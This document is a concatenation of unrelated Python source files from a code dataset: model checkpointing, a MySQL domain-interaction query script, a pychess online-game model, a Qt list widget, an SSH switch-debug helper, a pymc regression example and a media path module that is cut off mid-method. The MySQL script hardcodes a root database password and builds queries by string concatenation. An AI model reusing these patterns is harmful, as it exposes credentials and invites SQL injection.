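#       checkpoint -> checkpoint-00030000   (symlink to the most recent save)
#       checkpoint-00010000
#       checkpoint-00020000
#       checkpoint-00030000
#
# Checkpoints spaced closer together than keep_every_n steps are unlinked.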
class Saver(object):
"""Class to manage save and restore for the model and optimizer."""
def __init__(self, model, optimizer, keep_every_n=None):
self._model = model
self._optimizer = optimizer
self._keep_every_n = keep_every_n
def restore(self, model_dir, map_to_cpu=False, step=None):
"""Restores model and optimizer from given directory.
Returns:
Last training step for the model restored.
"""
last_step = load_checkpoint(
self._model, self._optimizer, model_dir, map_to_cpu, step)
return last_step
def save(self, model_dir, step):
"""Saves model and optimizer to given directory.
Args:
model_dir: Model directory to save.
step: Current training step.
"""
save_checkpoint(self._model, self._optimizer, step, model_dir,
keep_every_n=self._keep_every_n)
def restore_part(self, other_model_dir, remap):
"""Restores part of the model from other directory.
Useful to initialize part of the model with another pretrained model.
Args:
other_model_dir: Model directory to load from.
remap: dict, remapping current parameters to the other model's.
"""
load_and_map_checkpoint(self._model, other_model_dir, remap)
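# Editor's note: a minimal usage sketch (not from the original file); the model,
# optimizer and directory names below are hypothetical placeholders.
#
#   saver = Saver(model, optimizer, keep_every_n=10000)
#   last_step = saver.restore("runs/exp1")      # returns 0 if no checkpoint exists yet
#   saver.save("runs/exp1", step=last_step + 1)
#   saver.restore_part("runs/pretrained",
#                      {"encoder.weight": "embed.weight"})  # current name -> other model's name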
def save_args(args):
if not os.path.exists(args.model_dir):
os.makedirs(args.model_dir)
with open(os.path.join(args.model_dir, 'args.json'), 'w') as f:
f.write(json.dumps(vars(args)))
def restore_args(args):
if not os.path.exists(args.model_dir):
raise Exception('{} does not exist'.format(args.model_dir))
with open(os.path.join(args.model_dir, 'args.json')) as f:
new_args = json.loads(f.read())
for arg in new_args:
if not hasattr(args, arg):
setattr(args, arg, new_args[arg])
def print_params(dct, indent=0):
for key in dct:
if isinstance(dct[key], dict):
print(" " * indent + str(key))
print_params(dct[key], indent + 2)
elif isinstance(dct[key], torch.Tensor):
print(" " * indent + key + " " + str(dct[key].size()))
else:
print(" " * indent + key + " = " + str(dct[key]))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Checkpoint Viewer')
parser.add_argument('--model_dir', type=str, default='')
args = parser.parse_args()
path = os.path.join(args.model_dir, 'checkpoint')
print("Loading model from %s" % path)
checkpoint = torch.load(path)
print_params(checkpoint)
| apache-2.0 | 1,880,076,072,383,120,600 | 31.982558 | 78 | 0.592279 | false | 3.737154 | false | false | false |
magic2du/contact_matrix | topologyTest/GetDDIsHaveOver2InterfacesHave16-20Examples.py | 1 | 2449 | import _mysql
from dealFile import *
# Get DDIs in which more than 2 interfaces have 16-20 examples
db=_mysql.connect(host="localhost",user="root",passwd="zxcv4321",db="DDI")
#db.query("""select COUNT(*) from PPI inner join example on (ID = PPI_ID) where domain1="ACT" and domain2="ACT" and topology_1 = 6 and topology_2 = 6""")
#db.query("""select * from PPI inner join example on (ID = PPI_ID) where domain1="ACT" and domain2="ACT" """)
ddiList=readDDIsFile('listOfDDIsHave2InterfacesOver15.txt')
ddis=[]
# Loop over DDIs whose 2 interfaces have more than 15 examples
for ddi in ddiList:
[domain1,domain2]=ddi
#print i
print domain1
print domain2
#query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
#query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
query='SELECT COUNT(DISTINCT topology_1,topology_2) from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
#print query
#query='select domain1,domain2 from DDI1'
db.query(query)
result=db.store_result()
numTopology=result.fetch_row(0)
#print numTopology[0][0]
if int(numTopology[0][0])>1:
Ctr=False
query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
db.query(query)
result=db.store_result()
rTopology=result.fetch_row(0)
numOver15=0
for val in rTopology[0:]:
[topology1,topology2]=val
try:
#print topology1+':'+topology2
query='SELECT COUNT(*) from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'" AND topology_1='+topology1+' AND topology_2='+topology2
print query
db.query(query)
result=db.store_result()
numExample=result.fetch_row(0)
print numExample[0][0]
except:
break
if int(numExample[0][0])>15:# if for those interfaces have more than 15 examples if they have less than 21 examples, add it.
if int(numExample[0][0])>20:
Ctr=False
break
else:
Ctr=True
if Ctr==True:
ddis.append(domain1+'_int_'+domain2)
writeListFile('listOfDDIsHaveOver2InterfacesHave15-20Examples.txt',ddis)
#print result.fetch_row()
#print r[0][0] readDDIsFile('listOfDDIsHave2InterfacesOver15.txt')
| gpl-2.0 | -4,267,599,292,644,156,000 | 44.351852 | 165 | 0.668028 | false | 3.269693 | false | false | false |
cajone/pychess | lib/pychess/ic/ICGameModel.py | 1 | 15072 | from __future__ import print_function
import threading
from pychess.compat import StringIO
from pychess.System.Log import log
from pychess.Utils.GameModel import GameModel
from pychess.Utils.Offer import Offer
from pychess.Utils.const import REMOTE, DRAW, WHITE, BLACK, RUNNING, WHITEWON, KILLED, \
TAKEBACK_OFFER, WON_CALLFLAG, WAITING_TO_START, BLACKWON, PAUSE_OFFER, PAUSED, \
RESUME_OFFER, DISCONNECTED, CHAT_ACTION, RESIGNATION, FLAG_CALL, OFFERS, LOCAL, \
ACTION_ERROR_NONE_TO_ACCEPT, UNFINISHED_STATES, ABORT_OFFER
from pychess.Players.Human import Human
from pychess.Savers import fen as fen_loader
from pychess.ic import GAME_TYPES, TYPE_TOURNAMENT_DIRECTOR
class ICGameModel(GameModel):
def __init__(self, connection, ficsgame, timemodel):
assert ficsgame.game_type in GAME_TYPES.values()
GameModel.__init__(self, timemodel, ficsgame.game_type.variant)
self.connection = connection
self.ficsgame = ficsgame
self.ficsplayers = (ficsgame.wplayer, ficsgame.bplayer)
self.gmwidg_ready = threading.Event()
connections = self.connections
connections[connection.bm].append(connection.bm.connect(
"boardUpdate", self.onBoardUpdate))
connections[connection.bm].append(connection.bm.connect(
"timesUpdate", self.onTimesUpdate))
connections[connection.bm].append(connection.bm.connect(
"obsGameEnded", self.onGameEnded))
connections[connection.bm].append(connection.bm.connect(
"curGameEnded", self.onGameEnded))
connections[connection.bm].append(connection.bm.connect(
"gamePaused", self.onGamePaused))
connections[connection.bm].append(connection.bm.connect(
"madeExamined", self.onMadeExamined))
connections[connection.bm].append(connection.bm.connect(
"madeUnExamined", self.onMadeUnExamined))
connections[connection.om].append(connection.om.connect(
"onActionError", self.onActionError))
connections[connection.cm].append(connection.cm.connect(
"kibitzMessage", self.onKibitzMessage))
connections[connection.cm].append(connection.cm.connect(
"whisperMessage", self.onWhisperMessage))
connections[connection.cm].append(connection.cm.connect(
"observers_received", self.onObserversReceived))
connections[connection].append(connection.connect("disconnected",
self.onDisconnected))
rated = "rated" if ficsgame.rated else "unrated"
# This is in the format that ficsgames.org writes these PGN headers
self.tags["Event"] = "FICS %s %s game" % (rated,
ficsgame.game_type.fics_name)
self.tags["Site"] = "freechess.org"
def __repr__(self):
string = GameModel.__repr__(self)
string = string.replace("<GameModel", "<ICGameModel")
fics_game = repr(self.ficsgame)
string = string.replace(", players=", ", ficsgame=%s, players=" % fics_game)
return string
@property
def display_text(self):
text = "[ "
if self.timed:
text += self.timemodel.display_text + " "
text += self.ficsgame.display_rated.lower() + " "
if self.ficsgame.game_type.display_text:
text += self.ficsgame.game_type.display_text + " "
return text + "]"
def __disconnect(self):
if self.connections is None:
return
for obj in self.connections:
# Humans need to stay connected post-game so that "GUI > Actions" works
if isinstance(obj, Human):
continue
for handler_id in self.connections[obj]:
if obj.handler_is_connected(handler_id):
log.debug("ICGameModel.__disconnect: object=%s handler_id=%s" %
(repr(obj), repr(handler_id)))
obj.disconnect(handler_id)
def ficsplayer(self, player):
if player.ichandle == self.ficsplayers[0].name:
return self.ficsplayers[0]
else:
return self.ficsplayers[1]
@property
def remote_player(self):
if self.players[0].__type__ == REMOTE:
return self.players[0]
else:
return self.players[1]
@property
def remote_ficsplayer(self):
return self.ficsplayer(self.remote_player)
def hasGuestPlayers(self):
for player in self.ficsplayers:
if player.isGuest():
return True
return False
@property
def noTD(self):
for player in self.ficsplayers:
if TYPE_TOURNAMENT_DIRECTOR in player.titles:
return False
return True
def onBoardUpdate(self, bm, gameno, ply, curcol, lastmove, fen, wname,
bname, wms, bms):
log.debug(("ICGameModel.onBoardUpdate: id=%s self.ply=%s self.players=%s gameno=%s " +
"wname=%s bname=%s ply=%s curcol=%s lastmove=%s fen=%s wms=%s bms=%s") %
(str(id(self)), str(self.ply), repr(self.players), str(gameno), str(wname), str(bname),
str(ply), str(curcol), str(lastmove), str(fen), str(wms), str(bms)))
if gameno != self.ficsgame.gameno or len(self.players) < 2:
            # LectureBot always uses gameno 1 for many games in one lecture
# or wname != self.players[0].ichandle or bname != self.players[1].ichandle:
return
log.debug("ICGameModel.onBoardUpdate: id=%d, self.players=%s: updating time and/or ply" %
(id(self), str(self.players)))
if self.timed:
log.debug("ICGameModel.onBoardUpdate: id=%d self.players=%s: updating timemodel" %
(id(self), str(self.players)))
# If game end coming from helper connection before last move made
# we have to tap() ourselves
if self.status in (DRAW, WHITEWON, BLACKWON):
if self.timemodel.ply < ply:
self.timemodel.paused = False
self.timemodel.tap()
self.timemodel.paused = True
self.timemodel.updatePlayer(WHITE, wms / 1000.)
self.timemodel.updatePlayer(BLACK, bms / 1000.)
if lastmove is None:
if bname != self.tags["Black"]:
self.tags["Black"] = self.players[
BLACK].name = self.ficsplayers[BLACK].name = bname
self.emit("players_changed")
if wname != self.tags["White"]:
self.tags["White"] = self.players[
WHITE].name = self.ficsplayers[WHITE].name = wname
self.emit("players_changed")
if self.boards[-1].asFen() != fen:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
elif ply < self.ply:
log.debug("ICGameModel.onBoardUpdate: id=%d self.players=%s \
self.ply=%d ply=%d: TAKEBACK" %
(id(self), str(self.players), self.ply, ply))
for offer in list(self.offers.keys()):
if offer.type == TAKEBACK_OFFER:
# There can only be 1 outstanding takeback offer for both players on FICS,
# (a counter-offer by the offeree for a takeback for a different number of
# moves replaces the initial offer) so we can safely remove all of them
del self.offers[offer]
# In some cases (like lost on time) the last move is resent
# or we just observing an examined game
if self.reason != WON_CALLFLAG:
if len(self.moves) >= self.ply - ply:
self.undoMoves(self.ply - ply)
else:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
elif ply > self.ply + 1:
self.status = RUNNING
self.loadAndStart(
StringIO(fen),
fen_loader,
0,
-1,
first_time=False)
self.emit("game_started")
curPlayer = self.players[self.curColor]
curPlayer.resetPosition()
def onTimesUpdate(self, bm, gameno, wms, bms):
if gameno != self.ficsgame.gameno:
return
if self.timed:
self.timemodel.updatePlayer(WHITE, wms / 1000.)
self.timemodel.updatePlayer(BLACK, bms / 1000.)
def onMadeExamined(self, bm, gameno):
self.examined = True
def onMadeUnExamined(self, bm, gameno):
self.examined = False
def onGameEnded(self, bm, ficsgame):
if ficsgame == self.ficsgame and len(self.players) >= 2:
log.debug(
"ICGameModel.onGameEnded: self.players=%s ficsgame=%s" %
(repr(self.players), repr(ficsgame)))
self.end(ficsgame.result, ficsgame.reason)
def setPlayers(self, players):
GameModel.setPlayers(self, players)
if self.players[WHITE].icrating:
self.tags["WhiteElo"] = self.players[WHITE].icrating
if self.players[BLACK].icrating:
self.tags["BlackElo"] = self.players[BLACK].icrating
def onGamePaused(self, bm, gameno, paused):
if paused:
self.pause()
else:
self.resume()
# we have to do this here rather than in acceptReceived(), because
# sometimes FICS pauses/unpauses a game clock without telling us that the
# original offer was "accepted"/"received", such as when one player offers
# "pause" and the other player responds not with "accept" but "pause"
for offer in list(self.offers.keys()):
if offer.type in (PAUSE_OFFER, RESUME_OFFER):
del self.offers[offer]
def onDisconnected(self, connection):
if self.status in (WAITING_TO_START, PAUSED, RUNNING):
self.end(KILLED, DISCONNECTED)
############################################################################
# Chat management #
############################################################################
def onKibitzMessage(self, cm, name, gameno, text):
if not self.gmwidg_ready.is_set():
self.gmwidg_ready.wait()
if gameno != self.ficsgame.gameno:
return
self.emit("message_received", name, text)
def onWhisperMessage(self, cm, name, gameno, text):
if gameno != self.ficsgame.gameno:
return
self.emit("message_received", name, text)
def onObserversReceived(self, other, gameno, observers):
if int(gameno) != self.ficsgame.gameno:
return
self.emit("observers_received", observers)
############################################################################
# Offer management #
############################################################################
def offerReceived(self, player, offer):
log.debug("ICGameModel.offerReceived: offerer=%s %s" %
(repr(player), offer))
if player == self.players[WHITE]:
opPlayer = self.players[BLACK]
else:
opPlayer = self.players[WHITE]
if offer.type == CHAT_ACTION:
opPlayer.putMessage(offer.param)
elif offer.type in (RESIGNATION, FLAG_CALL):
self.connection.om.offer(offer, self.ply)
elif offer.type in OFFERS:
if offer not in self.offers:
log.debug("ICGameModel.offerReceived: %s.offer(%s)" %
(repr(opPlayer), offer))
self.offers[offer] = player
opPlayer.offer(offer)
# If the offer was an update to an old one, like a new takebackvalue
# we want to remove the old one from self.offers
for offer_ in list(self.offers.keys()):
if offer.type == offer_.type and offer != offer_:
del self.offers[offer_]
def acceptReceived(self, player, offer):
log.debug("ICGameModel.acceptReceived: accepter=%s %s" %
(repr(player), offer))
if player.__type__ == LOCAL:
if offer not in self.offers or self.offers[offer] == player:
player.offerError(offer, ACTION_ERROR_NONE_TO_ACCEPT)
else:
log.debug(
"ICGameModel.acceptReceived: connection.om.accept(%s)" %
offer)
self.connection.om.accept(offer)
del self.offers[offer]
# We don't handle any ServerPlayer calls here, as the fics server will
# know automatically if he/she accepts an offer, and will simply send
# us the result.
def checkStatus(self):
pass
def onActionError(self, om, offer, error):
self.emit("action_error", offer, error)
#
# End
#
def end(self, status, reason):
if self.examined:
self.connection.bm.unexamine()
if self.status in UNFINISHED_STATES:
self.__disconnect()
if self.isObservationGame():
self.connection.bm.unobserve(self.ficsgame)
else:
self.connection.om.offer(Offer(ABORT_OFFER), -1)
self.connection.om.offer(Offer(RESIGNATION), -1)
if status == KILLED:
GameModel.kill(self, reason)
else:
GameModel.end(self, status, reason)
def terminate(self):
for obj in self.connections:
for handler_id in self.connections[obj]:
if obj.handler_is_connected(handler_id):
obj.disconnect(handler_id)
self.connections = None
GameModel.terminate(self)
def goFirst(self):
self.connection.client.run_command("backward 999")
def goPrev(self, step=1):
self.connection.client.run_command("backward %s" % step)
def goNext(self, step=1):
self.connection.client.run_command("forward %s" % step)
def goLast(self):
self.connection.client.run_command("forward 999")
def backToMainLine(self):
self.connection.client.run_command("revert")
| gpl-3.0 | -6,825,854,460,330,208,000 | 39.735135 | 105 | 0.558519 | false | 3.994699 | false | false | false |
robocomp/robocomp | tools/robocompdsl-gui/customListWidget.py | 1 | 1926 | from PySide2.QtWidgets import QListWidget
from PySide2.QtCore import Signal, Slot, Qt
from PySide2 import QtCore
class CustomListWidget(QListWidget):
customItemSelection = Signal()
def __init__(self, parent=None):
super(CustomListWidget, self).__init__(parent)
self.itemList = []
self.setMinimumSize(QtCore.QSize(160, 0))
self.setMaximumSize(QtCore.QSize(245, 16777215))
def mousePressEvent(self, event):
super(CustomListWidget, self).mousePressEvent(event)
item = self.itemAt(event.pos())
if item:
text = item.text().split(":")[0]
# check button clicked
if event.button() == Qt.LeftButton:
if (event.modifiers() == Qt.ShiftModifier) or (event.modifiers() == Qt.ControlModifier):
self.itemList.append(text)
else:
count = self.itemList.count(text)
self.clearItems()
for c in range(count + 1):
self.itemList.append(text)
elif event.button() == Qt.RightButton:
if text in self.itemList:
self.itemList.remove(text)
# update list text
count = self.itemList.count(text)
self.itemAt(event.pos()).setSelected(count)
if count:
self.itemAt(event.pos()).setText(text + ":" + str(count))
else:
# self.itemAt(event.pos()).setPlainText(text)
self.itemAt(event.pos()).setText(text)
self.customItemSelection.emit()
else:
self.clearItems()
def clearItems(self):
self.itemList = []
for pos in range(self.count()):
self.item(pos).setText(self.item(pos).text().split(":")[0])
# return our custom selected item list
def customItemList(self):
return self.itemList
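# Editor's note: an illustrative usage sketch (not part of the original widget); the
# parent widget and item names are hypothetical.
#
#   lst = CustomListWidget(parent)
#   lst.addItems(["camera", "laser", "joystick"])
#   lst.customItemSelection.connect(lambda: print(lst.customItemList()))
#
# A plain left-click keeps only the clicked item (incrementing its count), a
# Shift/Ctrl-click adds another copy, and a right-click removes one copy;
# customItemList() returns the accumulated names.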
| gpl-3.0 | -5,969,716,672,523,269,000 | 35.339623 | 104 | 0.562305 | false | 4.133047 | false | false | false |
manmeetsaini/etools | etools-module/execute.py | 1 | 4452 | ''' This module will enable/disable debug for ST Voice switches and
Voice switches, Phones and any generic machine using MS Windows.
_________________________________________________________________________________
|-- startdebug(self,device="switch",argv)
| argv options: sip,trunk,ssua,sb,ext
| device:"switch", "phone" ;
| key:cert key to be used
|
|-- savedebug(self)
|-- cleardebug(self)
class--debug(cls)--|
|-- setdebugenv(self,device="switch)
| "switch" option will enable following:
| - cli
| - trace_redirect 0
| - trace_redirect 1
| "Phone" option will enable following
| - TBA
|-- startTshark(self)
|-- stopTshark(self)
|-- uploadTshark(self,destination)
"will be uploaded to temp directory of script"
_____________________________________________________________________________________
++Changelist++
Version 1.0: Initial program created
_________________________________________________________________________________
TODO
- Add all functions()
Questions & Feedback: Please contact etoolsclub.com
_________________________________________________________________________________
'''
import etools
import re
import string
import paramiko
import traceback
import sys
import os
from time import sleep
from etools import SSH
from utilities import Directory
login = paramiko.SSHClient()
class SendCommand(SSH):
def startDebug(self):
try:
ssh=self.login.invoke_shell()
ssh.send('cli \n')
sleep(3)
ssh.send('trace_redirect 0 \n')
sleep(3)
ssh.send('trace_redirect 1 \n')
sleep(3)
ssh.send('dbg "on sip" \n')
except Exception:
traceback.print_exc()
    def stopDebug(self):
try:
ssh=self.login.invoke_shell()
ssh.send('dbg "clear" \n')
output= ssh.recv(65535)
path=Directory.create()
with open(r'temp\binarydata.log','wb') as f:
f.write(output)
f.close()
ssh.disconnect()
print ("Closing the SSH Session")
except Exception:
traceback.print_exc()
def sendTone(self ,tonetype):
try:
pass
except Exception:
traceback.print_exc()
def resetTone(self):
try:
pass
except Exception:
traceback.print_exc()
def startCapture(self,filters):
'''use Tshark utility'''
try:
pass
except Exception:
traceback.print_exc()
def stopCapture(self,filters):
try:
pass
except Exception:
traceback.print_exc()
def getCallID(self,samplefile):
samplefile="c:\\Python3\\sample.log"
startstring = "INVITE sip:"
endstring = "Content-Length:"
string = "CallID:"
try:
with open(samplefile , "rb") as infile:
for result in re.findall(b"INVITE sip:(.*?)Content-Length:", infile.read(), re.S): #This will find INVITE transaction
callid = re.findall(b"Call-ID:(.*?)\n", result, re.DOTALL) #This will find CallID within that INVITE Transaction
for i in callid: #Need to iterate list as findall creates a list.
print (i.decode("utf-8")) #This will convert Binary string to regular string
infile.close()
with open('Callid.log', 'wb') as f:
f.write(result)
f.close()
except Exception:
traceback.print_exc()
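# Editor's note: an illustrative sketch of the input getCallID() expects (not from the
# original file). Given a capture file containing a block such as:
#
#   INVITE sip:[email protected] SIP/2.0
#   Call-ID: 3c2a6f1d9e@10.0.0.5
#   Content-Length: 0
#
# the regexes above isolate each INVITE ... Content-Length span, print the Call-ID
# found inside it, and write the last matched span to Callid.log.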
if __name__ == "__main__":
b = SendCommand()
b.connect()
b.startDebug()
    b.stopDebug()
| gpl-3.0 | 2,025,106,535,800,736,800 | 32.246154 | 160 | 0.431941 | false | 4.746269 | false | false | false |
sniemi/SamPy | statistics/bayesian/examples.py | 1 | 5785 | import pymc
def pymc_linear_fit_withoutliers(data1, data2, data1err=None, data2err=None,
print_results=False, intercept=True, nsample=50000, burn=5000,
thin=5, return_MC=False, guess=None, verbose=0):
"""
Use pymc to fit a line to data with outliers, assuming outliers
    come from a broad, uniform distribution that covers all the data.
:param data1: xdata
:param data2: ydata
:param data1err: x errors
:param data2err: y errors
:param print_results: whether or not to print out the results
:param intercept: whether or not to fit for intercept
:param nsample: number of samples
:param burn: number of burn-in samples
:param thin: thinnening value
:param return_MC: whether or not to return the pymc MCMC instance
:param guess: initial guessues for slope and intercept
:param verbose: verbosity level of MCMC sampler
"""
if guess is None:
guess = (0, 0)
xmu = pymc.distributions.Uninformative(name='x_observed', value=0)
if data1err is None:
xdata = pymc.distributions.Normal('x', mu=xmu, observed=True, value=data1, tau=1, trace=False)
else:
xtau = pymc.distributions.Uninformative(name='x_tau', value=1.0 / data1err ** 2, observed=True, trace=False)
xdata = pymc.distributions.Normal('x', mu=xmu, observed=True, value=data1, tau=xtau, trace=False)
d = {'slope': pymc.distributions.Uninformative(name='slope', value=guess[0]),
'badvals': pymc.distributions.DiscreteUniform('bad', 0, 1, value=[False] * len(data2)),
'bady': pymc.distributions.Uniform('bady', min(data2 - data2err), max(data2 + data2err), value=data2)}
if intercept:
d['intercept'] = pymc.distributions.Uninformative(name='intercept', value=guess[1])
@pymc.deterministic(trace=False)
def model(x=xdata, slope=d['slope'], intercept=d['intercept'], badvals=d['badvals'], bady=d['bady']):
return (x * slope + intercept) * (True - badvals) + badvals * bady
else:
@pymc.deterministic(trace=False)
def model(x=xdata, slope=d['slope'], badvals=d['badvals'], bady=d['bady']):
return x * slope * (True - badvals) + badvals * bady
d['f'] = model
if data2err is None:
ydata = pymc.distributions.Normal('y', mu=model, observed=True, value=data2, tau=1, trace=False)
else:
ytau = pymc.distributions.Uninformative(name='y_tau', value=1.0 / data2err ** 2, observed=True, trace=False)
ydata = pymc.distributions.Normal('y', mu=model, observed=True, value=data2, tau=ytau, trace=False)
d['y'] = ydata
MC = pymc.MCMC(d)
MC.sample(nsample, burn=burn, thin=thin, verbose=verbose)
MCs = MC.stats()
m, em = MCs['slope']['mean'], MCs['slope']['standard deviation']
if intercept:
b, eb = MCs['intercept']['mean'], MCs['intercept']['standard deviation']
if print_results:
print "MCMC Best fit y = %g x" % (m),
if intercept:
print " + %g" % (b)
else:
print ""
print "m = %g +/- %g" % (m, em)
if intercept:
print "b = %g +/- %g" % (b, eb)
print "Chi^2 = %g, N = %i" % (((data2 - (data1 * m)) ** 2).sum(), data1.shape[0] - 1)
if return_MC:
return MC
if intercept:
return m, b
else:
return m
if __name__ == "__main__":
import numpy as np
import matplotlib.pyplot as plt
from pymc.Matplot import plot
    #fake data columns: [x, y, yerr, xerr]
data = np.array([[201, 592, 61, 9],
[244, 401, 25, 4],
[47, 583, 58, 11],
[287, 402, 15, 7],
[203, 495, 21, 5],
[58, 173, 15, 9],
[210, 479, 27, 4],
[202, 504, 14, 4],
[198, 510, 30, 11],
[158, 416, 16, 7],
[165, 393, 14, 5],
[201, 442, 25, 5],
[157, 317, 52, 5],
[131, 311, 16, 6],
[166, 400, 34, 6],
[160, 337, 31, 5],
[186, 423, 42, 9],
[125, 334, 26, 8],
[218, 533, 16, 6],
[146, 344, 22, 5],
[150, 300, 23, 10],
[270, 620, 40, 15]])
#rename columns
xdata, ydata = data[:, 0], data[:, 1]
xerr, yerr = data[:, 3], data[:, 2]
#perform MCMC
MC = pymc_linear_fit_withoutliers(xdata, ydata, data1err=xerr, data2err=yerr, return_MC=True)
MC.sample(100000, burn=1000, verbose=0)
#show the results
fig = plt.figure()
#plot the confidence levels
low25 = np.linspace(20,300)*MC.stats()['slope']['quantiles'][2.5] + MC.stats()['intercept']['quantiles'][2.5]
top97 = np.linspace(20,300)*MC.stats()['slope']['quantiles'][97.5] + MC.stats()['intercept']['quantiles'][97.5]
    plt.fill_between(np.linspace(20,300), low25, top97, color='k', alpha=0.1, label='2.5/97.5 percentile')
#plot the average results
plt.plot(np.linspace(20,300), np.linspace(20,300)*MC.stats()['slope']['mean'] + MC.stats()['intercept']['mean'],
color='k', linewidth=1, label='Average fit')
#plot data
plt.errorbar(xdata, ydata, xerr=xerr, yerr=yerr, color='b', label='data', fmt='o')
#show likely outliers
plt.plot(xdata[MC.badvals.value.astype('bool')], ydata[MC.badvals.value.astype('bool')], 'rs',
label='likely outliers')
plt.xlim(20, 300)
plt.legend(shadow=True, fancybox=True, scatterpoints=1, numpoints=1, loc='upper left')
plt.savefig('test.pdf')
plt.close()
#MCMC plot
plot(MC) | bsd-2-clause | -7,291,049,673,270,601,000 | 37.317881 | 116 | 0.557303 | false | 3.303826 | false | false | false |
j0r1/simpactcyan | src/tests/config/rundisttests.py | 1 | 2994 | #!/usr/bin/env python
import os
import sys
sys.path.append(os.path.realpath(os.path.join(os.path.realpath(__file__),"../../../../util")))
import histogram
import subprocess
settings = [
{
"type": "fixed",
"params": [ ("value", 0.5) ],
"plotrange": (-1, 1),
"f": "samples=100000;s=0.01;f(x,p) = 1.0/(sqrt(2.0*pi)*s)*exp(-(x-p)**2/(2*s**2))"
},
{
"type": "uniform",
"params": [ ("min", -1), ("max", 4) ],
"plotrange": (-2, 5),
"f": "H(x) = (x/abs(x)+1.0)/2.0 ; f(x,a,b) = 1.0/(b-a)*H(x-a)*H(b-x)"
},
{
"type": "beta",
"params": [ ("a", 2), ("b", 5), ("min", -2), ("max", 3) ],
"plotrange": (-3,4),
"f": "H(x) = (x/abs(x)+1.0)/2.0; f(x,a,b,k,l) = gamma(a+b)/(gamma(a)*gamma(b))*((x-k)/(l-k))**(a-1.0)*(1.0-((x-k)/(l-k)))**(b-1.0)*H(x-k)*H(l-x)/(l-k)"
},
{
"type": "gamma",
"params": [ ("a", 5), ("b", 1.5) ],
"plotrange": (0, 15),
"f": "f(x,a,b) = x**(a-1.0)*exp(-x/b)/(b**a*gamma(a))"
},
{
"type": "lognormal",
"params": [ ("zeta", 0.5), ("sigma", 0.25) ],
"plotrange": (0, 3),
"f": "f(x,z,s) = 1.0/(x*s*sqrt(2.0*pi))*exp(-(log(x)-z)**2/(2.0*s**2))"
}
]
for s in settings:
# Write config file for these settings
lines = [ ]
lines.append("test.dist.type = " + s["type"])
for p in s["params"]:
lines.append("test.dist." + s["type"] + "." + p[0] + " = " + str(p[1]))
data = "\n".join(lines)
fileName = "config-tmp-" + s["type"]
with open(fileName, "wt") as f:
f.write(data)
f.close()
# Run the executable with this config file
outName = "out-tmp-" + s["type"]
with open(outName, "wt") as f:
subprocess.call( [ "../../../build_ninja2/testconfig-opt-debug", fileName ], stdout=f)
f.close()
# Process generated value in histogram
h = histogram.Histogram(s["plotrange"][0], s["plotrange"][1], 100)
with open(outName, "rt") as f:
l = f.readline()
while l:
val = float(l)
h.process(val)
l = f.readline()
f.close()
histName = "hist-tmp-" + s["type"]
with open(histName, "wt") as f:
h.printProb(f)
f.close()
# Write gnuplot file
plotName = "plot-tmp-" + s["type"] + ".gnuplot"
pngName = "plot-tmp-" + s["type"] + ".png"
with open(plotName, "wt") as f:
print >>f, "set terminal png"
print >>f, "set style data lines"
print >>f, "set output '%s'" % pngName
print >>f, s["f"]
function = "f(x"
for p in s["params"]:
function += "," + str(float(p[1]))
function += ") "
print >>f, "plot [%g:%g] '%s', %s lt 3" % (s["plotrange"][0],s["plotrange"][1],histName,function)
subprocess.call( [ "gnuplot", plotName ])
os.unlink(plotName)
os.unlink(histName)
os.unlink(outName)
os.unlink(fileName)
| gpl-3.0 | 5,577,433,038,708,251,000 | 27.788462 | 159 | 0.462592 | false | 2.692446 | false | false | false |
kyokley/MediaConverter | path.py | 1 | 4835 | import requests
import os
from settings import (SERVER_NAME,
MEDIAVIEWER_TV_PATH_URL,
MEDIAVIEWER_MOVIE_PATH_URL,
WAITER_USERNAME,
WAITER_PASSWORD,
LOCAL_TV_SHOWS_PATHS,
LOCAL_MOVIE_PATHS,
VERIFY_REQUESTS,
)
from utils import postData
from log import LogFile
log = LogFile().getLogger()
class Path(object):
def __init__(self,
localpath,
remotepath):
self.localpath = localpath
self.remotepath = remotepath
def _post(self, useMovieURL=False):
if useMovieURL:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
values = {'localpath': self.localpath,
'remotepath': self.remotepath,
'skip': False,
'server': SERVER_NAME,
}
postData(values, url)
def postMovie(self):
self._post(useMovieURL=True)
def postTVShow(self):
self._post(useMovieURL=False)
@classmethod
def _getPaths(cls, getMovies=False):
pathDict = dict()
if getMovies:
url = MEDIAVIEWER_MOVIE_PATH_URL
else:
url = MEDIAVIEWER_TV_PATH_URL
data = {'next': url}
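        # Page through the API: each JSON response carries a 'next' URL until exhausted.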
while data['next']:
request = requests.get(data['next'], verify=VERIFY_REQUESTS, auth=(WAITER_USERNAME, WAITER_PASSWORD))
request.raise_for_status()
data = request.json()
if data['results']:
for result in data['results']:
pathDict.setdefault(result['localpath'], set()).add(result['pk'])
return pathDict
@classmethod
def getTVPaths(cls):
return cls._getPaths(getMovies=False)
@classmethod
def getMoviePaths(cls):
return cls._getPaths(getMovies=True)
@classmethod
def _getLocalPaths(cls, getMovies=False):
if getMovies:
filepaths = LOCAL_MOVIE_PATHS
else:
filepaths = LOCAL_TV_SHOWS_PATHS
return cls._buildLocalPaths(filepaths)
@staticmethod
def _buildLocalPaths(filepaths):
localpaths = set()
for localpath in filepaths:
if not os.path.exists(localpath):
log.error('{} does not exist. Continuing...'.format(localpath))
continue
res = set([os.path.join(localpath, path) for path in os.listdir(localpath) if path])
localpaths.update(res)
return localpaths
@classmethod
def getLocalTVPaths(cls):
return cls._getLocalPaths(getMovies=False)
@classmethod
def getLocalMoviePaths(cls):
return cls._getLocalPaths(getMovies=True)
@classmethod
def _getAllPaths(cls, getMovies=False):
''' Returns a dict of localpaths related to pathids
Local paths not in the server are represented with pathid -1.
'''
